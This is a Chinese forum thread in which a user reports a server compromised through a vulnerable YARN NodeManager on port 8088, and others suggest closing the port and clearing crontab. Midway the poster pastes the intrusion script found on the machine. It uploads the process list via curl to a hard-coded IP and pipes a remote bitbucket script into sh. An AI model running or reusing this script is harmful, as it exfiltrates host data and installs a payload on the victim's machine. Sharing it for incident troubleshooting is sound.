@aloof 8088 就是我要使用的端口 然后问题就是从这个端口上出的 。firewalld 和安全组我都是只开我自己用的。 但是那个 8088 上跑的程序有安全漏洞。被人黑了

@hdonghong 我这会就是直接把 8088 关了就没事了。你这个跟我这个是不是一样我不清楚啊。我这个是因为 8088 的一个服务有安全漏洞。然后脚本什么的应该就是通过 8088 植入的 我把 8088 关了就好了。具体你根据你自己的实际情况来。不行就把先把 crontab 弄掉。然后把你自定义的防火墙规则全关了得了 。再一步一步排查

@likuku 好

@Greenm 是 yarn 加个口令是什么操作命令行还是配置文件。我搜到一个关于这个的配置文件 不过 property 里面好像有些变量 在对号

@likuku 就是说 不管这些人是通过什么方式入侵 最后都是通过 ssh 吗 ssh 端口我倒是没改 只是禁了 root 和密码登录， 我搜索到的是说我 8088 跑的东西有一些安全机制的问题 ，后台的版本修复了 。但是我用的那个版本较低，还是有这个漏洞的。 老哥我已经好几个问题看见你帮我了 /笑哭 多谢多谢

@watzds 确实好像是一个服务有漏洞

@WordTian 8088 跑着一个 yarn 我刚才查到是 nodemanager 的漏洞 最开始好像是个俄罗斯黑客发现并利用的漏洞， 目前还在继续找解决办法

以前没在意过这些 安全组都是直接地址段访问然后 0.0.0.0/0
这会有点难受了

@WordTian 你好 请问有办法限制 ip 吗？ 我搞了一会搞不好 直接关了 8088 我这边好多也不方便了

#!/bin/bash

ps ax --sort=-pcpu > /tmp/tmp2.txt
#netstat -antp > /tmp/tmp2.txt
#crontab -l > /tmp/tmp2.txt
#ps -eo uid,pid,ppid,stime,%cpu,cmd --sort=-%cpu |grep -v STIME| head>/tmp/tmp2.txt
#top -c -n 1 -b > /tmp/tmp.txt
curl -F "file=@/tmp/tmp2.txt" http://46.249.38.186/rep.php
rm -rf /tmp/tmp2.txt

LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi

if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ];
then
$LDR https://bitbucket.org/okjh6t37/mygit/raw/master/zz.sh | sh
else
pwd
fi


这可能是那个脚本

。。哦哦 不好意思确实刚知道
===
终结

正八经就是计算机呗 搞一点就是祭天的 滑稽.png

同样哎 楼主 这几天 facebook 疯狂要我传照片 我传一次好使一天。 然后基本只过一天也就是 第二天又得验证又得传照片 。 我都传两次了 。 今天又让我传。 心态崩了

@wenzhoou 这个感觉不错

@zhangZMZ 一股清流~

@whileFalse 一楼是在调侃楼主吧==